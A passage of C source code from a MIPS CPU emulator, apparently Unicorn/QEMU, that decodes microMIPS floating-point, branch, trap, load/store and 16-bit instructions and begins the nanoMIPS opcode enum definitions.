OPC_##prfx##_PS; \ goto do_fpop; \ default: \ goto pool32f_invalid; \ } case MINA_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_farith(ctx, OPC_MINA_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MINA_D, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case MAXA_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_farith(ctx, OPC_MAXA_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MAXA_D, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case 0x30: /* regular FP ops */ switch ((ctx->opcode >> 6) & 0x3) { case ADD_FMT: FINSN_3ARG_SDPS(ADD); break; case SUB_FMT: FINSN_3ARG_SDPS(SUB); break; case MUL_FMT: FINSN_3ARG_SDPS(MUL); break; case DIV_FMT: fmt = (ctx->opcode >> 8) & 0x3; if (fmt == 1) { mips32_op = OPC_DIV_D; } else if (fmt == 0) { mips32_op = OPC_DIV_S; } else { goto pool32f_invalid; } goto do_fpop; default: goto pool32f_invalid; } break; case 0x38: /* cmovs */ switch ((ctx->opcode >> 6) & 0x7) { case MOVN_FMT: /* SELEQZ_FMT */ if (ctx->insn_flags & ISA_MIPS32R6) { /* SELEQZ_FMT */ switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_sel_s(ctx, OPC_SELEQZ_S, rd, rt, rs); break; case FMT_SDPS_D: gen_sel_d(ctx, OPC_SELEQZ_D, rd, rt, rs); break; default: goto pool32f_invalid; } } else { /* MOVN_FMT */ FINSN_3ARG_SDPS(MOVN); } break; case MOVN_FMT_04: check_insn_opc_removed(ctx, ISA_MIPS32R6); FINSN_3ARG_SDPS(MOVN); break; case MOVZ_FMT: /* SELNEZ_FMT */ if (ctx->insn_flags & ISA_MIPS32R6) { /* SELNEZ_FMT */ switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_sel_s(ctx, OPC_SELNEZ_S, rd, rt, rs); break; case FMT_SDPS_D: gen_sel_d(ctx, OPC_SELNEZ_D, rd, rt, rs); break; default: goto pool32f_invalid; } } else { /* MOVZ_FMT */ FINSN_3ARG_SDPS(MOVZ); } break; case MOVZ_FMT_05: check_insn_opc_removed(ctx, ISA_MIPS32R6); FINSN_3ARG_SDPS(MOVZ); break; case SEL_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_sel_s(ctx, OPC_SEL_S, rd, rt, rs); break; case FMT_SDPS_D: gen_sel_d(ctx, OPC_SEL_D, rd, rt, rs); break; default: goto pool32f_invalid; } break; case MADDF_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: mips32_op = OPC_MADDF_S; goto do_fpop; case FMT_SDPS_D: mips32_op = OPC_MADDF_D; goto do_fpop; default: goto pool32f_invalid; } break; case MSUBF_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: mips32_op = OPC_MSUBF_S; goto do_fpop; case FMT_SDPS_D: mips32_op = OPC_MSUBF_D; goto do_fpop; default: goto pool32f_invalid; } break; default: goto pool32f_invalid; } break; do_fpop: gen_farith(ctx, mips32_op, rt, rs, rd, 0); break; default: pool32f_invalid: MIPS_INVAL("pool32f"); generate_exception_end(ctx, EXCP_RI); break; } } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; case POOL32I: minor = (ctx->opcode >> 21) & 0x1f; switch (minor) { case BLTZ: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BLTZ, 4, rs, -1, imm << 1, 4); break; case BLTZAL: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BLTZAL, 4, rs, -1, imm << 1, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case BLTZALS: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BLTZAL, 4, rs, -1, imm << 1, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case BGEZ: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BGEZ, 4, rs, -1, imm << 1, 4); break; case BGEZAL: 
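/* For these branch-and-link forms the final gen_compute_branch() argument is the required delay-slot size: 4 for the plain forms, 2 for the *ALS variants, which take a 16-bit instruction in the slot. */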
check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BGEZAL, 4, rs, -1, imm << 1, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case BGEZALS: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BGEZAL, 4, rs, -1, imm << 1, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case BLEZ: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BLEZ, 4, rs, -1, imm << 1, 4); break; case BGTZ: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BGTZ, 4, rs, -1, imm << 1, 4); break; /* Traps */ case TLTI: /* BC1EQZC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* BC1EQZC */ check_cp1_enabled(ctx); gen_compute_branch1_r6(ctx, OPC_BC1EQZ, rs, imm << 1, 0); } else { /* TLTI */ mips32_op = OPC_TLTI; goto do_trapi; } break; case TGEI: /* BC1NEZC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* BC1NEZC */ check_cp1_enabled(ctx); gen_compute_branch1_r6(ctx, OPC_BC1NEZ, rs, imm << 1, 0); } else { /* TGEI */ mips32_op = OPC_TGEI; goto do_trapi; } break; case TLTIU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_TLTIU; goto do_trapi; case TGEIU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_TGEIU; goto do_trapi; case TNEI: /* SYNCI */ if (ctx->insn_flags & ISA_MIPS32R6) { /* SYNCI */ /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; } else { /* TNEI */ mips32_op = OPC_TNEI; goto do_trapi; } break; case TEQI: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_TEQI; do_trapi: gen_trap(ctx, mips32_op, rs, -1, imm); break; case BNEZC: case BEQZC: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, minor == BNEZC ? OPC_BNE : OPC_BEQ, 4, rs, 0, imm << 1, 0); /* * Compact branches don't have a delay slot, so just let * the normal delay slot handling take us to the branch * target. */ break; case LUI: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_logic_imm(ctx, OPC_LUI, rs, 0, imm); break; case SYNCI: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; break; case BC2F: case BC2T: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* COP2: Not implemented. */ generate_exception_err(ctx, EXCP_CpU, 2); break; case BC1F: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = (ctx->opcode & (1 << 16)) ? OPC_BC1FANY2 : OPC_BC1F; goto do_cp1branch; case BC1T: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = (ctx->opcode & (1 << 16)) ? OPC_BC1TANY2 : OPC_BC1T; goto do_cp1branch; case BC1ANY4F: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_BC1FANY4; goto do_cp1mips3d; case BC1ANY4T: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_BC1TANY4; do_cp1mips3d: check_cop1x(ctx); check_insn(ctx, ASE_MIPS3D); /* Fall through */ do_cp1branch: if (env->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); gen_compute_branch1(ctx, mips32_op, (ctx->opcode >> 18) & 0x7, imm << 1); } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; case BPOSGE64: case BPOSGE32: /* MIPS DSP: not implemented */ /* Fall through */ default: MIPS_INVAL("pool32i"); generate_exception_end(ctx, EXCP_RI); break; } break; case POOL32C: minor = (ctx->opcode >> 12) & 0xf; offset = sextract32(ctx->opcode, 0, (ctx->insn_flags & ISA_MIPS32R6) ? 
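/* R6 narrows the POOL32C signed offset from 12 bits to 9; the EVA sub-pools below re-extract a 9-bit offset and use bits [11:9] as a minor opcode. */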
9 : 12); switch (minor) { case LWL: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWL; goto do_ld_lr; case SWL: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWL; goto do_st_lr; case LWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWR; goto do_ld_lr; case SWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWR; goto do_st_lr; #if defined(TARGET_MIPS64) case LDL: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LDL; goto do_ld_lr; case SDL: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SDL; goto do_st_lr; case LDR: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LDR; goto do_ld_lr; case SDR: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SDR; goto do_st_lr; case LWU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); mips32_op = OPC_LWU; goto do_ld_lr; case LLD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); mips32_op = OPC_LLD; goto do_ld_lr; #endif case LL: mips32_op = OPC_LL; goto do_ld_lr; do_ld_lr: gen_ld(ctx, mips32_op, rt, rs, offset); break; do_st_lr: gen_st(ctx, mips32_op, rt, rs, offset); break; case SC: gen_st_cond(ctx, rt, rs, offset, MO_TESL, false); break; #if defined(TARGET_MIPS64) case SCD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_st_cond(ctx, rt, rs, offset, MO_TEQ, false); break; #endif case LD_EVA: if (!ctx->eva) { MIPS_INVAL("pool32c ld-eva"); generate_exception_end(ctx, EXCP_RI); break; } check_cp0_enabled(ctx); minor2 = (ctx->opcode >> 9) & 0x7; offset = sextract32(ctx->opcode, 0, 9); switch (minor2) { case LBUE: mips32_op = OPC_LBUE; goto do_ld_lr; case LHUE: mips32_op = OPC_LHUE; goto do_ld_lr; case LWLE: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWLE; goto do_ld_lr; case LWRE: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWRE; goto do_ld_lr; case LBE: mips32_op = OPC_LBE; goto do_ld_lr; case LHE: mips32_op = OPC_LHE; goto do_ld_lr; case LLE: mips32_op = OPC_LLE; goto do_ld_lr; case LWE: mips32_op = OPC_LWE; goto do_ld_lr; }; break; case ST_EVA: if (!ctx->eva) { MIPS_INVAL("pool32c st-eva"); generate_exception_end(ctx, EXCP_RI); break; } check_cp0_enabled(ctx); minor2 = (ctx->opcode >> 9) & 0x7; offset = sextract32(ctx->opcode, 0, 9); switch (minor2) { case SWLE: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWLE; goto do_st_lr; case SWRE: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWRE; goto do_st_lr; case PREFE: /* Treat as no-op */ if ((ctx->insn_flags & ISA_MIPS32R6) && (rt >= 24)) { /* hint codes 24-31 are reserved and signal RI */ generate_exception(ctx, EXCP_RI); } break; case CACHEE: /* Treat as no-op */ if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, offset); } break; case SBE: mips32_op = OPC_SBE; goto do_st_lr; case SHE: mips32_op = OPC_SHE; goto do_st_lr; case SCE: gen_st_cond(ctx, rt, rs, offset, MO_TESL, true); break; case SWE: mips32_op = OPC_SWE; goto do_st_lr; }; break; case PREF: /* Treat as no-op */ if ((ctx->insn_flags & ISA_MIPS32R6) && (rt >= 24)) { /* hint codes 24-31 are reserved and signal RI */ generate_exception(ctx, EXCP_RI); } break; default: MIPS_INVAL("pool32c"); generate_exception_end(ctx, EXCP_RI); break; } break; case ADDI32: /* AUI, LUI */ if (ctx->insn_flags & ISA_MIPS32R6) { /* AUI, LUI */ gen_logic_imm(ctx, OPC_LUI, rt, rs, imm); } else { /* ADDI32 
*/ mips32_op = OPC_ADDI; goto do_addi; } break; case ADDIU32: mips32_op = OPC_ADDIU; do_addi: gen_arith_imm(ctx, mips32_op, rt, rs, imm); break; /* Logical operations */ case ORI32: mips32_op = OPC_ORI; goto do_logici; case XORI32: mips32_op = OPC_XORI; goto do_logici; case ANDI32: mips32_op = OPC_ANDI; do_logici: gen_logic_imm(ctx, mips32_op, rt, rs, imm); break; /* Set less than immediate */ case SLTI32: mips32_op = OPC_SLTI; goto do_slti; case SLTIU32: mips32_op = OPC_SLTIU; do_slti: gen_slt_imm(ctx, mips32_op, rt, rs, imm); break; case JALX32: check_insn_opc_removed(ctx, ISA_MIPS32R6); offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; gen_compute_branch(ctx, OPC_JALX, 4, rt, rs, offset, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case JALS32: /* BOVC, BEQC, BEQZALC */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rs >= rt) { /* BOVC */ mips32_op = OPC_BOVC; } else if (rs < rt && rs == 0) { /* BEQZALC */ mips32_op = OPC_BEQZALC; } else { /* BEQC */ mips32_op = OPC_BEQC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); } else { /* JALS32 */ offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 1; gen_compute_branch(ctx, OPC_JAL, 4, rt, rs, offset, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; } break; case BEQ32: /* BC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* BC */ gen_compute_compact_branch(ctx, OPC_BC, 0, 0, sextract32(ctx->opcode << 1, 0, 27)); } else { /* BEQ32 */ gen_compute_branch(ctx, OPC_BEQ, 4, rt, rs, imm << 1, 4); } break; case BNE32: /* BALC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* BALC */ gen_compute_compact_branch(ctx, OPC_BALC, 0, 0, sextract32(ctx->opcode << 1, 0, 27)); } else { /* BNE32 */ gen_compute_branch(ctx, OPC_BNE, 4, rt, rs, imm << 1, 4); } break; case J32: /* BGTZC, BLTZC, BLTC */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rs == 0 && rt != 0) { /* BGTZC */ mips32_op = OPC_BGTZC; } else if (rs != 0 && rt != 0 && rs == rt) { /* BLTZC */ mips32_op = OPC_BLTZC; } else { /* BLTC */ mips32_op = OPC_BLTC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); } else { /* J32 */ gen_compute_branch(ctx, OPC_J, 4, rt, rs, (int32_t)(ctx->opcode & 0x3FFFFFF) << 1, 4); } break; case JAL32: /* BLEZC, BGEZC, BGEC */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rs == 0 && rt != 0) { /* BLEZC */ mips32_op = OPC_BLEZC; } else if (rs != 0 && rt != 0 && rs == rt) { /* BGEZC */ mips32_op = OPC_BGEZC; } else { /* BGEC */ mips32_op = OPC_BGEC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); } else { /* JAL32 */ gen_compute_branch(ctx, OPC_JAL, 4, rt, rs, (int32_t)(ctx->opcode & 0x3FFFFFF) << 1, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; } break; /* Floating point (COP1) */ case LWC132: mips32_op = OPC_LWC1; goto do_cop1; case LDC132: mips32_op = OPC_LDC1; goto do_cop1; case SWC132: mips32_op = OPC_SWC1; goto do_cop1; case SDC132: mips32_op = OPC_SDC1; do_cop1: gen_cop1_ldst(ctx, mips32_op, rt, rs, imm); break; case ADDIUPC: /* PCREL: ADDIUPC, AUIPC, ALUIPC, LWPC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* PCREL: ADDIUPC, AUIPC, ALUIPC, LWPC */ switch ((ctx->opcode >> 16) & 0x1f) { case ADDIUPC_00: case ADDIUPC_01: case ADDIUPC_02: case ADDIUPC_03: case ADDIUPC_04: case ADDIUPC_05: case ADDIUPC_06: case ADDIUPC_07: gen_pcrel(ctx, OPC_ADDIUPC, ctx->base.pc_next & ~0x3, rt); break; case AUIPC: gen_pcrel(ctx, OPC_AUIPC, ctx->base.pc_next, rt); break; case ALUIPC: gen_pcrel(ctx, OPC_ALUIPC, ctx->base.pc_next, rt); break; case LWPC_08: case LWPC_09: case LWPC_0A: case LWPC_0B: case LWPC_0C: case LWPC_0D: case LWPC_0E: case LWPC_0F: gen_pcrel(ctx, R6_OPC_LWPC, 
ctx->base.pc_next & ~0x3, rt); break; default: generate_exception(ctx, EXCP_RI); break; } } else { /* ADDIUPC */ int reg = mmreg(ZIMM(ctx->opcode, 23, 3)); offset = SIMM(ctx->opcode, 0, 23) << 2; gen_addiupc(ctx, reg, offset, 0, 0); } break; case BNVC: /* BNEC, BNEZALC */ check_insn(ctx, ISA_MIPS32R6); if (rs >= rt) { /* BNVC */ mips32_op = OPC_BNVC; } else if (rs < rt && rs == 0) { /* BNEZALC */ mips32_op = OPC_BNEZALC; } else { /* BNEC */ mips32_op = OPC_BNEC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); break; case R6_BNEZC: /* JIALC */ check_insn(ctx, ISA_MIPS32R6); if (rt != 0) { /* BNEZC */ gen_compute_compact_branch(ctx, OPC_BNEZC, rt, 0, sextract32(ctx->opcode << 1, 0, 22)); } else { /* JIALC */ gen_compute_compact_branch(ctx, OPC_JIALC, 0, rs, imm); } break; case R6_BEQZC: /* JIC */ check_insn(ctx, ISA_MIPS32R6); if (rt != 0) { /* BEQZC */ gen_compute_compact_branch(ctx, OPC_BEQZC, rt, 0, sextract32(ctx->opcode << 1, 0, 22)); } else { /* JIC */ gen_compute_compact_branch(ctx, OPC_JIC, 0, rs, imm); } break; case BLEZALC: /* BGEZALC, BGEUC */ check_insn(ctx, ISA_MIPS32R6); if (rs == 0 && rt != 0) { /* BLEZALC */ mips32_op = OPC_BLEZALC; } else if (rs != 0 && rt != 0 && rs == rt) { /* BGEZALC */ mips32_op = OPC_BGEZALC; } else { /* BGEUC */ mips32_op = OPC_BGEUC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); break; case BGTZALC: /* BLTZALC, BLTUC */ check_insn(ctx, ISA_MIPS32R6); if (rs == 0 && rt != 0) { /* BGTZALC */ mips32_op = OPC_BGTZALC; } else if (rs != 0 && rt != 0 && rs == rt) { /* BLTZALC */ mips32_op = OPC_BLTZALC; } else { /* BLTUC */ mips32_op = OPC_BLTUC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); break; /* Loads and stores */ case LB32: mips32_op = OPC_LB; goto do_ld; case LBU32: mips32_op = OPC_LBU; goto do_ld; case LH32: mips32_op = OPC_LH; goto do_ld; case LHU32: mips32_op = OPC_LHU; goto do_ld; case LW32: mips32_op = OPC_LW; goto do_ld; #ifdef TARGET_MIPS64 case LD32: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); mips32_op = OPC_LD; goto do_ld; case SD32: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); mips32_op = OPC_SD; goto do_st; #endif case SB32: mips32_op = OPC_SB; goto do_st; case SH32: mips32_op = OPC_SH; goto do_st; case SW32: mips32_op = OPC_SW; goto do_st; do_ld: gen_ld(ctx, mips32_op, rt, rs, imm); break; do_st: gen_st(ctx, mips32_op, rt, rs, imm); break; default: generate_exception_end(ctx, EXCP_RI); break; } } static int decode_micromips_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op; /* make sure instructions are on a halfword boundary */ if (ctx->base.pc_next & 0x1) { env->CP0_BadVAddr = ctx->base.pc_next; generate_exception_end(ctx, EXCP_AdEL); return 2; } op = (ctx->opcode >> 10) & 0x3f; /* Enforce properly-sized instructions in a delay slot */ if (ctx->hflags & MIPS_HFLAG_BDS_STRICT) { switch (op & 0x7) { /* MSB-3..MSB-5 */ case 0: /* POOL32A, POOL32B, POOL32I, POOL32C */ case 4: /* ADDI32, ADDIU32, ORI32, XORI32, SLTI32, SLTIU32, ANDI32, JALX32 */ case 5: /* LBU32, LHU32, POOL32F, JALS32, BEQ32, BNE32, J32, JAL32 */ case 6: /* SB32, SH32, ADDIUPC, SWC132, SDC132, SW32 */ case 7: /* LB32, LH32, LWC132, LDC132, LW32 */ if (ctx->hflags & MIPS_HFLAG_BDS16) { generate_exception_end(ctx, EXCP_RI); return 2; } break; case 1: /* POOL16A, POOL16B, POOL16C, LWGP16, POOL16F */ case 2: /* LBU16, LHU16, LWSP16, LW16, SB16, SH16, SWSP16, SW16 */ case 3: /* MOVE16, ANDI16, POOL16D, POOL16E, BEQZ16, BNEZ16, B16, LI16 */ if (ctx->hflags & 
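/* Conversely, a 16-bit instruction is invalid in a delay slot that requires a 32-bit one. */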
MIPS_HFLAG_BDS32) { generate_exception_end(ctx, EXCP_RI); return 2; } break; } } switch (op) { case POOL16A: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rs1 = mmreg(uMIPS_RS1(ctx->opcode)); int rs2 = mmreg(uMIPS_RS2(ctx->opcode)); uint32_t opc = 0; switch (ctx->opcode & 0x1) { case ADDU16: opc = OPC_ADDU; break; case SUBU16: opc = OPC_SUBU; break; } if (ctx->insn_flags & ISA_MIPS32R6) { /* * In Release 6, the location of the register numbers in * the instruction encoding changed. */ gen_arith(ctx, opc, rs1, rd, rs2); } else { gen_arith(ctx, opc, rd, rs1, rs2); } } break; case POOL16B: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rs = mmreg(uMIPS_RS(ctx->opcode)); int amount = (ctx->opcode >> 1) & 0x7; uint32_t opc = 0; amount = amount == 0 ? 8 : amount; /* encoded 0 means a shift by 8 */ switch (ctx->opcode & 0x1) { case SLL16: opc = OPC_SLL; break; case SRL16: opc = OPC_SRL; break; } gen_shift_imm(ctx, opc, rd, rs, amount); } break; case POOL16C: if (ctx->insn_flags & ISA_MIPS32R6) { gen_pool16c_r6_insn(ctx); } else { gen_pool16c_insn(ctx); } break; case LWGP16: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rb = 28; /* GP */ int16_t offset = SIMM(ctx->opcode, 0, 7) << 2; gen_ld(ctx, OPC_LW, rd, rb, offset); } break; case POOL16F: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->opcode & 1) { generate_exception_end(ctx, EXCP_RI); } else { /* MOVEP */ int enc_dest = uMIPS_RD(ctx->opcode); int enc_rt = uMIPS_RS2(ctx->opcode); int enc_rs = uMIPS_RS1(ctx->opcode); gen_movep(ctx, enc_dest, enc_rt, enc_rs); } break; case LBU16: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4); offset = (offset == 0xf ? -1 : offset); /* encoded 0xf means -1 */ gen_ld(ctx, OPC_LBU, rd, rb, offset); } break; case LHU16: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4) << 1; gen_ld(ctx, OPC_LHU, rd, rb, offset); } break; case LWSP16: { int rd = (ctx->opcode >> 5) & 0x1f; int rb = 29; /* SP */ int16_t offset = ZIMM(ctx->opcode, 0, 5) << 2; gen_ld(ctx, OPC_LW, rd, rb, offset); } break; case LW16: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4) << 2; gen_ld(ctx, OPC_LW, rd, rb, offset); } break; case SB16: { int rd = mmreg2(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4); gen_st(ctx, OPC_SB, rd, rb, offset); } break; case SH16: { int rd = mmreg2(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4) << 1; gen_st(ctx, OPC_SH, rd, rb, offset); } break; case SWSP16: { int rd = (ctx->opcode >> 5) & 0x1f; int rb = 29; /* SP */ int16_t offset = ZIMM(ctx->opcode, 0, 5) << 2; gen_st(ctx, OPC_SW, rd, rb, offset); } break; case SW16: { int rd = mmreg2(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4) << 2; gen_st(ctx, OPC_SW, rd, rb, offset); } break; case MOVE16: { int rd = uMIPS_RD5(ctx->opcode); int rs = uMIPS_RS5(ctx->opcode); gen_arith(ctx, OPC_ADDU, rd, rs, 0); } break; case ANDI16: gen_andi16(ctx); break; case POOL16D: switch (ctx->opcode & 0x1) { case ADDIUS5: gen_addius5(ctx); break; case ADDIUSP: gen_addiusp(ctx); break; } break; case POOL16E: switch (ctx->opcode & 0x1) { case ADDIUR2: gen_addiur2(ctx); break; case ADDIUR1SP: gen_addiur1sp(ctx); break; } break; case B16: /* BC16 */ gen_compute_branch(ctx, OPC_BEQ, 2, 0, 0, sextract32(ctx->opcode, 0, 10) << 1, (ctx->insn_flags & ISA_MIPS32R6) ? 
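/* Under R6 this encoding is BC16, a compact branch with no delay slot (size 0); pre-R6 B16 expects a 32-bit delay-slot instruction (size 4). */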
0 : 4); break; case BNEZ16: /* BNEZC16 */ case BEQZ16: /* BEQZC16 */ gen_compute_branch(ctx, op == BNEZ16 ? OPC_BNE : OPC_BEQ, 2, mmreg(uMIPS_RD(ctx->opcode)), 0, sextract32(ctx->opcode, 0, 7) << 1, (ctx->insn_flags & ISA_MIPS32R6) ? 0 : 4); break; case LI16: { int reg = mmreg(uMIPS_RD(ctx->opcode)); int imm = ZIMM(ctx->opcode, 0, 7); imm = (imm == 0x7f ? -1 : imm); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], imm); } break; case RES_29: case RES_31: case RES_39: generate_exception_end(ctx, EXCP_RI); break; default: decode_micromips32_opc(env, ctx); return 4; } return 2; } /* * * nanoMIPS opcodes * */ /* MAJOR, P16, and P32 pools opcodes */ enum { NM_P_ADDIU = 0x00, NM_ADDIUPC = 0x01, NM_MOVE_BALC = 0x02, NM_P16_MV = 0x04, NM_LW16 = 0x05, NM_BC16 = 0x06, NM_P16_SR = 0x07, NM_POOL32A = 0x08, NM_P_BAL = 0x0a, NM_P16_SHIFT = 0x0c, NM_LWSP16 = 0x0d, NM_BALC16 = 0x0e, NM_P16_4X4 = 0x0f, NM_P_GP_W = 0x10, NM_P_GP_BH = 0x11, NM_P_J = 0x12, NM_P16C = 0x14, NM_LWGP16 = 0x15, NM_P16_LB = 0x17, NM_P48I = 0x18, NM_P16_A1 = 0x1c, NM_LW4X4 = 0x1d, NM_P16_LH = 0x1f, NM_P_U12 = 0x20, NM_P_LS_U12 = 0x21, NM_P_BR1 = 0x22, NM_P16_A2 = 0x24, NM_SW16 = 0x25, NM_BEQZC16 = 0x26, NM_POOL32F = 0x28, NM_P_LS_S9 = 0x29, NM_P_BR2 = 0x2a, NM_P16_ADDU = 0x2c, NM_SWSP16 = 0x2d, NM_BNEZC16 = 0x2e, NM_MOVEP = 0x2f, NM_POOL32S = 0x30, NM_P_BRI = 0x32, NM_LI16 = 0x34, NM_SWGP16 = 0x35, NM_P16_BR = 0x36, NM_P_LUI = 0x38, NM_ANDI16 = 0x3c, NM_SW4X4 = 0x3d, NM_MOVEPREV = 0x3f, }; /* POOL32A instruction pool */ enum { NM_POOL32A0 = 0x00, NM_SPECIAL2 = 0x01, NM_COP2_1 = 0x02, NM_UDI = 0x03, NM_POOL32A5 = 0x05, NM_POOL32A7 = 0x07, }; /* P.GP.W instruction pool */ enum { NM_ADDIUGP_W = 0x00, NM_LWGP = 0x02, NM_SWGP = 0x03, }; /* P48I instruction pool */ enum { NM_LI48 = 0x00, NM_ADDIU48 = 0x01, NM_ADDIUGP48 = 0x02, NM_ADDIUPC48 = 0x03, NM_LWPC48 = 0x0b, NM_SWPC48 = 0x0f, }; /* P.U12 instruction pool */ enum { NM_ORI = 0x00, NM_XORI = 0x01, NM_ANDI = 0x02, NM_P_SR = 0x03, NM_SLTI = 0x04, NM_SLTIU = 0x05, NM_SEQI = 0x06, NM_ADDIUNEG = 0x08, NM_P_SHIFT = 0x0c, NM_P_ROTX = 0x0d, NM_P_INS = 0x0e, NM_P_EXT = 0x0f, }; /* POOL32F instruction pool */ enum { NM_POOL32F_0 = 0x00, NM_POOL32F_3 = 0x03, NM_POOL32F_5 = 0x05, }; /* POOL32S instruction pool */ enum { NM_POOL32S_0 = 0x00, NM_POOL32S_4 = 0x04, }; /* P.LUI instruction pool */ enum { NM_LUI = 0x00, NM_ALUIPC = 0x01, }; /* P.GP.BH instruction pool */ enum { NM_LBGP = 0x00, NM_SBGP = 0x01, 